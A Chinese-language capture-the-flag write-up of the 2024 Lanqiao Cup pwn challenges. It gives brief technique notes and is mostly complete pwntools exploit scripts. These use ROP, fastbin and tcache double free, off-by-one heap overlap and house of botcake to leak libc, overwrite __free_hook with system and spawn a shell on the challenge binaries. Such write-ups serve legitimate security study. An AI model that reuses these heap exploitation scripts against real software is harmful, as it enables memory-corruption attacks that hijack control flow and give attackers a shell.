2024蓝桥杯

题目复现,也是有一定的收获,基本就是堆块错位的利用,没有uaf的话需要提取布置好size,有的话直接打

线上

第一题

签到题,$0绕过检测,重定向输出flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
from ae64 import AE64
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')   
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6') 
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
#p=remote('',)
p = process('./pwn')

rl("restricted stack.")
sl(b'$0\x00')

sh=0x601090
rl("...")
rdi=0x0000000000400933
payload=b'a'*(0x20+8)+p64(rdi)+p64(sh)+p64(rdi+1)+p64(elf.plt['system'])
s(payload)





inter()

第二题

只有一次uaf

2.31,add,free,edit,show四个功能函数

add固定只能申请0x50大小堆块

只存在一个漏洞

这里用到一个整理机制,tcachebin中不可以double free,但fastbin中可以,我们可以在fastbin中完成double free,先将tcachebin中的堆块清除,当我们申请一个堆块时,就会触发堆块分配进制,完成tcachebin attack

https://www.yuque.com/xiachi/rx5cxd/fnnowgt0q7z7spst

我们提前布置好size,造成堆块错位,之后我们可以去修改下一个堆块的size,使其合并,free大堆块后,在申请一个小堆块,也就是导致错位的堆块,得到libc地址,再次利用这个错位堆块,去修改bins中的fd位,攻击free_hook

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
from ae64 import AE64
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/root/glibc-all-in-one/libs/2.31-0ubuntu9.16_amd64/libc.so.6')   
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6') 
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
#p=remote('',)
p = process('./pwn')

def add(content):
	rl("4.exit")
	sl(str(1))
	sleep(0.1)
	s(content)
def free(i):
	rl("4.exit")
	sl(str(2))
	sleep(0.1)
	sl(str(i))
def show(i):
	rl("4.exit")
	sl(str(3))
	sleep(0.1)
	sl(str(i))
def uaf(i):
	rl("4.exit")
	sl(str(2106373))
	sleep(0.1)
	sl(str(i))

add(b'a')
add(p64(0)*5+p64(0x61))
for i in range(12):#2-13
	add(b'a')
for i in range(9):
	free(i+2)
uaf(0)
free(1)
free(0)

for i in range(7):#0-6
	add(b'b')

add(b'\x30')

add(b'a')
add(b'a')
add(p64(0)*5+p64(0x421))
free(6)
add(b'a')
show(6)
libc_base=get_addr64()-2019169
li(hex(libc_base))
system,bin_sh=get_sb()
malloc_hook,free_hook=get_hook()

free(11)
free(6)
free(10)
#bug()
add(p64(0)*5+p64(0x61)+p64(free_hook))
add(b'/bin/sh\x00')
add(p64(system))
#bug()
free(10)
inter()

线下

第一题

2.27的of by one

add,free,edit,show四个功能函数,add只能申请<0x100的堆块

开局一个伪随机数绕过,直接绕之后house of botcake泄露libc地址,of by one造成堆块重叠后攻击bins中的fd位为free_hook,最后get_shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
from ae64 import AE64
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('./libc-2.27.so')   
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6') 
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
#p=remote('',)
p = process('./pwn')
passwd = []
rl("a simple classic question")
elf1=ctypes.CDLL("./libc-2.27.so")
elf1.srand(elf1.time(0))
for i in range(7):
    passwd.append(chr(elf1.rand() % 80 + 32))  # 转换为字符并加入列表
string="".join(passwd)
print(string)    
rl("please login >>>>")
payload=string
sl(payload)


def add(idx,size):
	rl(":")
	sl(str(1))
	rl("Index: ")
	sl(str(idx))
	rl("Size ")
	sl(str(size))

def edit(idx,c):
	rl(":")
	sl(str(2))
	rl("Index: ")
	sl(str(idx))
	rl("Content: ")
	s(c)

def show(idx):
	rl(":")
	sl(str(3))
	rl("Index: ")
	sl(str(idx))

def free(idx):
	rl(":")
	sl(str(4))
	rl("Index: ")
	sl(str(idx))
for i in range(10):#0-9
	add(i,0xa8)
for i in range(7):
	free(i)
free(7)
add(10,0x28)
show(10)
libc_base=get_addr64()-4111680
li(hex(libc_base))
malloc_hook,free_hook=get_hook()
system,bin_sh=get_sb()
add(11,0x78)

add(12,0x18)
add(13,0x68)
add(14,0x68)
add(15,0x68)
add(16,0x18)

edit(12,b'\x00'*0x18+p8(0xe1))
free(13)
add(17,0xd8)
free(15)
free(14)
edit(17,b'\x00'*0x68+p64(0x71)+p64(free_hook)+b'\n')


add(18,0x68)
add(19,0x68)
edit(18,b'/bin/sh\x00'+b'\n')
edit(19,p64(system)+b'\n')

#bug()
free(18)
inter()

第二题

2.31堆

add,free,edit,show

存在uaf,add只能申请<0x60的堆块

中间可以申请一次大堆块,正解应该是堆块错位后覆盖size,free大堆块进入unsortdbin,得到libc地址,之后tcachebin attack攻击free_hook

还可以攻击tcachebin的指针区,修改0x290的bins的counts为7,再将指针区作为堆块申请出来,free后进入unsortdbin,show得到libc地址,tcacheBin attack攻击free_hook

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
from ae64 import AE64
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/root/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc.so.6')   
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6') 
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
#p=remote('',)
p = process('./pwn')

def add(i,size):
	rl(">> ")
	sl(str(1))
	rl("index: ")
	sl(str(i))
	rl("size: ")
	sl(str(size))
def free(i):
	rl(">> ")
	sl(str(2))
	rl("index: ")
	sl(str(i))
def show(i):
	rl(">> ")
	sl(str(4))
	rl("index: ")
	sl(str(i))
def edit(i,content):
	rl(">> ")
	sl(str(3))
	rl("index: ")
	sl(str(i))
	rl("contents: ")
	s(content)

add(0,0x58)
add(1,0x58)
add(2,0x58)
add(3,0x48)
add(4,0x48)
add(5,0x18)

free(0)
free(1)
show(1)
a=p.recv(6)
heap_base=u64(p.recv(6).ljust(8,b'\x00'))-0x2a0
li(hex(heap_base))

edit(1,p64(heap_base+0x30)+b'\n')
add(6,0x58)
add(7,0x58)
edit(7,p64(0)*5+p64(0x7000000000000)+b'\n')

free(4)
free(3)
edit(3,p64(heap_base+0x10)+b'\n')
add(8,0x48)
add(9,0x48)
free(9)
show(9)
libc_base=get_addr64()-2014176
li(hex(libc_base))
system,bin_sh=get_sb()
malloc_hook,free_hook=get_hook()
edit(9,p64(0)*5+b'\n')
free(2)
free(1)

edit(1,p64(free_hook)+b'\n')
add(10,0x58)
add(11,0x58)
edit(10,b'/bin/sh\x00\n')
edit(11,p64(system)+b'\n')
bug()

free(10)

inter()	
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
from ae64 import AE64
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/root/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc.so.6')   
#libc=ELF('/root/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6') 
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn')
#p=remote('',)
p = process('./pwn')

def add(i,size):
	rl(">> ")
	sl(str(1))
	rl("index: ")
	sl(str(i))
	rl("size: ")
	sl(str(size))
def free(i):
	rl(">> ")
	sl(str(2))
	rl("index: ")
	sl(str(i))
def show(i):
	rl(">> ")
	sl(str(4))
	rl("index: ")
	sl(str(i))
def edit(i,content):
	rl(">> ")
	sl(str(3))
	rl("index: ")
	sl(str(i))
	rl("contents: ")
	s(content)
def add2(size):
	rl(">> \n")
	sl(str(555))
	rl("find me\n")
	sl(str(size))


add(0,0x60)
add(1,0x60)
add2(0x400)
add(2,0x60)

free(1)
free(0)
bug()
edit(0,b'\n')
add(3,0x60)
add(4,0x60)
edit(4,p64(0)+p64(0x481)+b'\n')
free(1)
show(1)
libc_base=get_addr64()-2014176
li(hex(libc_base))
system,bin_sh=get_sb()
malloc_hook,free_hook=get_hook()

add(5,0x60)
free(5)
free(2)

edit(2,p64(free_hook)+b'\n')
add(6,0x60)
add(7,0x60)
edit(6,b'/bin/sh\x00\n')
edit(7,p64(system)+b'\n')
bug()

free(6)

inter()